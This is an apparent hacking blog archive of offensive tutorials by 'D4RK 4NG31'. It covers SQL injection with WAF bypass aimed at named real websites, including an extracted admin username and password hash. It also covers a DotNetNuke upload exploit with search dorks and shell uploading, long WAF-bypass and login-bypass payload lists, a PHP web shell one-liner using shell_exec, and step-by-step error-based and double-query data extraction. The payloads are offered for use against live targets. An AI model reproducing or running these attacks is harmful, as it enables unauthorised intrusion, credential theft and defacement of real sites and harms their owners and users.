D4RK 4NG31: September 2015

Tuesday, September 29, 2015

SQLi Challenge Solution 1

First Hello to all :) from D4RK 4NG31

Target : http://exoticindiatours.in/pckge-details.php?id=2

Now, Let's Start

Finding which comment is working

http://exoticindiatours.in/pckge-details.php?id=2' --+ ====> error
http://exoticindiatours.in/pckge-details.php?id=2 -- ====> no error it's mean comment (--) is working..

-- = # mostly

So, we don't have to use any comment :))

Now it's time to find columns

First we'll use order by

http://exoticindiatours.in/pckge-details.php?id=2 order by 122 ====> Blocked

order by function is blocked.. so, we'll use group by instead of order by

http://exoticindiatours.in/pckge-details.php?id=2 group by 122 ====> showing error it's mean it's working :D

http://exoticindiatours.in/pckge-details.php?id=2 group by 2 ====> Error

http://exoticindiatours.in/pckge-details.php?id=2 group by 1 ====> No error

So, The vuln column is 1

Now, time to use union select

http://exoticindiatours.in/pckge-details.php?id=2 union select 1 ===> Blocked
http://exoticindiatours.in/pckge-details.php?id=2 /*!50000union*/ /*!50000select*/ ====> again blocked

seems Site block special chars (*,!)

Now It's time to do encryption.

For this we'll use union(select

In this .. We'll type columns like this " union(select (1),(2),(3),(4),(5))

Let's try..

http://exoticindiatours.in/pckge-details.php?id=2 union(select (1)) ====> :)) working....

Now it's time to use DIOS

as i already told u concat func is used for print multiple queries

http://exoticindiatours.in/pckge-details.php?id=2 union(select (concat(version(),database(),user()))

We get an error... seems site is blocking ( , ) comma

To bypass we'll use variable method :

and@x:=

Let's try this :

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat(version(),database(),user()) union(select (@x))

again error

Let's try Waf. First we'll see which word is blocking site :

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat====(version(),database(),user()) union(select (@x)) ===> No error

Concat( = Blocked

For this we'll use + with great amount

Let's do it:

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++(0x3c703e496e6a6563746564206279204434524b20344e4733313c2f703e,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user())+UNION(SELECT(@x))#

Done :) Happy Injecting ;) Tutorial by D4RK 4NG31

Easy and Simple Way to make DIOS

First We'll Print Our Cyber name

To use html tags we'll use them between apostrophes ( ' ) like '<p>Injected by D4RK 4NG31</p>'

And we'll use Concat function for multiple queries

So, Let's Start..

Concat('<h2>Injected by D4RK 4NG31</h2>') :D Done

Now For Print Version,Database,User .... We'll use these commands @@version,database(),user() and will use <br> for new line :)

Concat('<h2>Injected by D4RK 4NG31</h2>','<p>Version ::</p>',@@version,'<br>','<p>Database ::</p>',database(),'<br>','<p>User ::</p>',user(),'<br>')

Done :D we've printed all things now it's time to print tables and columns

Now for this we'll use this query

(select group_concat(column_name,'<br>',table_name) from information_schema.columns where table_schema=database())

Now add this query in DIOS

Concat('<h2>Injected by D4RK 4NG31</h2>','<p>Version ::</p>',@@version,'<br>','<p>Database ::</p>',database(),'<br>','<p>User ::</p>',user(),'<br>',(select group_concat(column_name,'<br>',table_name) from information_schema.columns where table_schema=database()))

HTML tags into hex :

Concat(0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,@@version,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,database(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,user(),0x3c62723e,(select group_concat(column_name,0x3c62723e,table_name) from information_schema.columns where table_schema=database()))

DIOS completed now Happy Injecting :)))

Tutorial by D4RK 4NG31 ;)

DNN ( DotNetNuke ) Website Hacking

How To Hack Websites Using DotNetNuke Exploit + Shell Uploading
Hello everyone!! Previously we have discussed about "How to Hack Website Using Havij SQL Injection". Today,I am going to tell about one more very usefull but old method which you can used to hack website using Dot net nuke(DNN) exploit. I know some of you know about this method DNN but it is very good exploit to hack dot net sites. B
y using this DNN exploit, you can even hack all sites which are hosted on same server. Also you can upload any file using it. It is easy method as compared to other hacking attacks such as SQL-Injection and Cross Site Scripting etc.
What is DNN (Dot Net Nuke) ?
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.
Step 1: First go to google.com search page and use this following dork to find vulnerable site.
inurl:home/tabid/36/language/en-US/Default.aspx
another dorks you can use
inurl:fcklinkgallery.aspx
inurl:/portals/0
Step 2: Now open any site from the search list like
http://www.vulsite.com/…/tab…/36/language/en-US/Default.aspx
Now replace "home/tabid/36/language/en-US/Default.aspx" with Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
so your url will become
http://www.vulsite.com/…/HtmlEditor…/Fck/fcklinkgallery.aspx
then hit enter
Step 3: Now there are 2 possibilities
if u get Link Gallery url select then site is not vulnerable , see the image below :
http://1.bp.blogspot.com/…/nGf…/s1600/website%2Bhacking1.jpg
and If you get Like shown in below image then target is vulnerable :
http://3.bp.blogspot.com/…/r3g…/s1600/website%2Bhacking2.jpg
ok now if you find a vulnerable site move to next step
Step 4: Now you can see 3 options there and we neeed to select “File in your site”.
http://3.bp.blogspot.com/…/29B…/s1600/website%2Bhacking3.jpg
Step 5: Now after selecting 3 options, we need to use a javascript code. For that we need to use that browser which supports javascript. So i use Opera Mini .
Before using javascript, first we need to choose file location as root, after that clear everything written on browser url and paste the below javascript only.
javascript:__doPostBack('ctlURL$cmdUpload','')
Step 6: After inject the above javascript code in browser address bar, you will get upload option instead of selection option.
http://2.bp.blogspot.com/…/dOg…/s1600/website%2Bhacking4.jpg
Step 7: Now you have to upload your shell.
Note : But remember you cant upload your shell directly in .php format and not even you can do anything by uploading .php.jpg
So for this purpose first we need to upload a special type of shell which is specially coded in asp.
Download the shell :- goto www.sh3ll.org .
Now rename your asp shell to
yourshell.asp;.jpg
and upload it.
After uploading you can access your ASP shell by going to this address,
http://www.vulsite.com/portals/0/yourshell.asp;.jpg
http://4.bp.blogspot.com/…/crr…/s1600/website%2Bhacking0.jpg
Step 8: Now upload your php shell using upload file option marked in above image.
After uploading php shell you can access it by going to this address,
http://www.vulsite.com/portals/0/yourphpshell.php
Step 9: Now replace your index.html with original index.html. Thats it.
Well you can also hack all sites which are hosted on same server.
For that follow the bellow image and click on Drives you will find all sites hosted on same server.
Click on any one site and follow the above process to upload you shell.
Happy website hacking!!!
—————————————-
# D4RK 4NG31
—————————————-

WAF Bypass Cheat Sheet

WAF Bypass Cheat Sheet

Union Select
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
+/*!u%6eion*/+/*!se%6cect*/+
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
union /*!50000%53elect*/
%55nion %53elect
+--+Union+--+Select+--+
+UnIoN/*&a=*/SeLeCT/*&a=*/
id=1+?UnI?On?+'SeL?ECT?
id=1+'UnI'||'on'+SeLeCT'
UnIoN SeLeCt CoNcAt(version())--
uNiOn aLl sElEcT
uUNIONnion all sSELECTelect
/*union*/union/*select*/select+1,2,3/*
/*uniXon*/union/*selXect*/select+1,2/*
un/**/ion+sel/**/ect
+#1q%0Aunion all#qa%0A#%0Aselect
union /*!select*/+
union/**/select/**/
/**/union/**/select/**/
/**/union/*!50000select*/
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/uniUNIONon/**/selSELECTect/**/
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
/**//*!union*//**//*!select*//**/
/**/UNunionION/**/SELselectECT/**/
/**//*UnIOn*//**//*SEleCt*//**/
/**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
/**/UNunionION/**/all/**/SELselectECT/**/
/**//*UnIOn*//**/all/**//*SEleCt*//**/
/**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
uni
%20union%20/*!select*/%20
union%23aa%0Aselect
union+distinct+select+
union+distinctROW+select+
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
/*!u%6eion*/+/*!se%6cect*/+
1%?)and(0)union(select(1),version(),3,4,5,6)%23%23%23
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
union /*!50000%53elect*/
+%2F**/+Union/*!select*/
%55nion %53elect
+?+Union+?+Select+?+
+UnIoN/*&a=*/SeLeCT/*&a=*/
uNiOn aLl sElEcT
uUNIONnion all sSELECTelect
union(select(1),2,3)
union (select 1111,2222,3333)
union (/*!/**/ SeleCT */ 11)
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*?*//*!all*//*?*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
id=1+?UnI?On?+?SeL?ECT?
id=1+?UnI?||?on?+SeLeCT?
union select 1?+%0A,2?+%0A,3?+%0A etc ?
/*!00000Union*/ /*!00000Select*/
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion %53elect
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+?UnI?On?+'SeL?ECT?
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
Union Select by PASS with Url Encoded Method:
%55nion(%53elect)
union%20distinct%20select
union%20%64istinctRO%57%20select
union%2053elect
%23?%0auion%20?%23?%0aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%55nion %53eLEct
u%6eion se%6cect
unio%6e %73elect
unio%6e%20%64istinc%74%20%73elect
uni%6fn distinct%52OW s%65lect
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7

Cheat Sheet of Bypassing Of Order by And Group By

order by/**_**/
/*!12345order*/ /*!12345by*/
) order by 1-- -
') order by 1-- -

')order by 1%23%23

%')order by 1%23%23

Null' order by 100--+

Null' order by 9999--+

')group by 99-- -

'group by 119449-- -

'group/**/by/**/99%23%23

Concat And Group_concat By Pass cheat Sheet ::

/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
/*!concat_ws(0x3a,)*/
concat_ws(0x3a3a3a,version()
CONCAT_WS(CHAR(32,58,32),version(),)

How to By Pass Tables:::
group_concat(/*!table_name*/)

+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES? -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*//*!TaBle_ScHEmA*/=schEMA()?
/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()? -
How to By Pass Columns:::
group_concat(/*!column_name*/)
+/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!froM*/ table? -

URL enCoded By passing Table and columns::
(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 ?

illegal mix of Collations ByPass ::

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)

http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?

SQLi Authentication Bypass Cheat Sheet

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Create Your CMD

We've to create CMD.. Let's Start . Follow these steps

1. Open Notepad

2. Paste this Code :

<?if($_GET['dark']){echo"<pre>".shell_exec($_GET["dark"]);}?>

3. Now Save it as with name "cmd.php"

4. Now upload it in website

5. Successfully Uploaded :))

6. Now we use this Command to test cmd is working or not. "cmd.php?dark=ls" where "cmd" is file name and "dark" is parameter and "ls" is to check how many files contain in current directory. If it's showing multiple files name then It means CMD is working.... :))))

Happy Hacking !

Hope You Like D4RK 4NG31 tutorial ;)

ERROR BASED / DOUBLE QUERY Injection

Difficulty: Intermediate Level 2 and Advanced
Requirements: Patience,intuition and understanding
Estimated time to read the chapter: 10-20 min (reading thoroughly will help you understand better)
Previous Chapters:
Chapter1: How to use/create dorks
Chapter2:Basic SQL injection using login queries
Chapter3: Detailed Union/Normal Based SQL injection

Alright I'll make this tutorial as short as possible so that you can understand faster.

Understanding Error Based/Double Query
How does Error Base and Double Query work
Error Based:

Code:

A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information

Double Query:

Code:

Basically like Error Based, except that the Error Based Query will be doubled as a single query statement so that we'll get errors with information in it

I'll explain further in this tutorial
Anyways, focus on this part of this tutorial
Error Based IS Double Query
Error Based = Double Query (Error based 2x)

How do you know you should use Error Based/Double Query? (Important!)
This is the most important part of web hacking; the type of injection to use in different situations.
You can use Error Based/ Double Query Injections in the following errors you get

Code:

a. The Used Select Statements Have  Different Number Of Columns.
b. Unknown Column 1 or no columns at all (in webpage and page source)
c.Error #1604

Now take note of those errors. You'll be needing it

Lets start with Error Based SQL injection
Alright for this lesson, we'll use this site as an example:
http://www.aliqbalschools.org

First approach is knowing the version of the database

To do that we enter this query after the end of the URL

Code:

or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

So the site will look like this

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

Results:

Now that we know the version of the database which is 5, lets move to the next step

Second step: Getting the database name
To get the database, we enter this query

Code:

and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Notice the limit function in the query
A website can have more than 2 two databases, so increase the limit until you find all database names
Example: limit 0,1 or limit 1,1 or limit 2,1

Now our website address will look like this

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Results:

Database is : iqbal_iqbal

Second step is done where we extract the database names we need.
MAKE sure you write the database name on a paper or notepad
We'll need it later

Third Step: Getting the TABLE NAMES
Table names is what we need now
Here's the query we can use:

Code:

and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Don't also forget the LIMIT function we used here to get table names one by one

Alright our web address will look like this:

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now here's the important part:
When you search for tables keep incrementing the limit until you find the valuable table name
For example: LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
Keep increasing the number until you find the table you want to extract the information from
Here's the formula: LIMIT N,1 where N is a random integer

Valuable Tables can be:

Code:

Users
Admin
user
administrator
tbladmin
tblusers
settings

In this case, we have the table "settings"
So now we know our table, lets move on to the next step

Fourth Step: Getting Columns from specific TABLE NAMES
Alright, now that you've chosen the table you wanna extract columns from, time to execute another query
So here's how a column query extraction will look like:

Code:

and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Notice the LIMIT 0,1 FUNCTION and 0xTABLEHEX
You need to convert your specific table into hex and add 0x at the beginning of the string so that it can be readable to the website
To convert a string to hex use: http://www.swingnote.com/tools/texttohex.php
Here's how the address will look like along with the query

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Results:

Code:

Duplicate entry 'Id~1' for key 'group_key

Now you need to increment the limit until you find valuable columns such as userName and passWord.
So in this case,
Column name = userName

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Column name= passWord

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Again, don't forget to see the LIMIT Function
Now that we found the columns we want to extract information from i.e "userName" and "passWord", lets proceed to the next step where we can actually get the login username and password

Fifth Step: Extracting the data from Columns
Alright this part is probably the best in SQL injecting site.
Time to get the info from the columns we have
To do that, use this query

Code:

and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now before you proceed, watch and focus on the code and study what happens.
Here we have 4 variables:
1. COLUMN_NAME: where you insert the column name you want to extract information from
2.Databasename: where you insert the current database name of the website so that you'll be extract info from it
3. TABLENAME: where you insert the table name of the column names you extracted from
4. LIMIT N,1: LIMIT Function and N where N is a random integer
Now lets do some replacing, FOCUS

Code:

COLUMN_NAME replace with "userName" and "passWord"
Databasename replace with "iqbal_iqbal"
TABLENAME replace with "settings"

After you're done with altering the code to your needs of extracting information, time to execute it
Here's what the code will look like:

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Results:

Code:

Duplicate entry 'admin~86f574c1d63d53fa804c13c3213953d9~1' for key

SUCCESS, you injected the site with error based now you have the login info
Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9
Go to http://www.md5decrypter.co.uk/ to crack that MD5 Hash

Now Lets Start with DOUBLE Query SQL Injection
So basically, as stated above, DOUBLE Query is the same like Error Based except the query we'll enter is gonna be double the normal error based query
First off, the definition so that you can understand:

Code:

Double query SQL injection is a vulnerability that uses two queries together wrapped into one that confuses the db to a point where it spits out an error. This error gives us the info we need to leverage the database all the way to the admin panel. As a matter of fact we can pretty much dump the whole database if we want.

Differences:
Error Based Query for Database Extraction:

Code:

and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Double Query for Database Extraction:

Code:

and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

Now you get the idea, lets cut to the chase and go on
We'll be using the same site as above

Step1: Getting the database version
Alright same as Error Based, here's the Double query:

Code:

and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

So our Address will look like this:

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

NOTE(IMPORTANT): Make sure that your queries are very well organized when you execute them, otherwise the browser will return the results as an error.

Results after query execution:

Code:

Duplicate entry '~'5.1.56-log'~1' for key 'group_key

Database version is 5
You can test on the site now if you want so that you won't get confused

Step2: Getting the Database
Now we've got the version, lets execute a double query on extracting the database
Query for Database extraction:

Code:

and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Notice the LIMIT Function again and make sure you don't make mistakes in that
It shows that
Limit N,1 where N is a random integer. Example: Limit 0,1

Here's what our address will then look like:

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Once more, don't forget about the LIMIT Function

So here's the results:

Code:

iqbal_iqbal

Now that's their database.
Note it down on a notepad or a paper

Step3: Getting the Table Names
As I've explained above, we'll be also using the LIMIT Function in this query.
Just a quick look, the query will look like this:

Code:

and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

Alright you need to focus on the code and see the changes.
There are two variables here:
1. Hex_code_databasename
2. LIMIT Function

Obviously, we need to Hex the database name we've just taken into record and add 0x in the beginning i.e. Database= 0xiqbal_iqbal
To convert your database name into hex: http://www.swingnote.com/tools/texttohex.php
Now that you've the database into hex, lets see what our address will look like:

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x697162616c5f697162616c LIMIT 19,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

LIMIT 19,1 brings us the valuable table which is "settings"
Review the code and study it

Step4: Getting Column names from specific Tables and Database
Now that we know what we need which are the table (settings) and database (iqbal_iqbal), lets proceed to the next step; column extraction
Here's what the query will look like:

Code:

and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Now here we have 3 variables:
1. Hex code of Databasename: Hex the database which in our case is (iqbal_iqbal)
2. Hex code of tablename: Hex the table name which is "settings"
3. LIMIT Function
Alright, I'm pretty sure you know what you have to do exactly so I don't need to explain everything again and again.

Here's what the address is gonna look like:

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x697162616c5f697162616c AND table_name=0x73657474696e6773 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Notice the hexed variables and the LIMIT Function
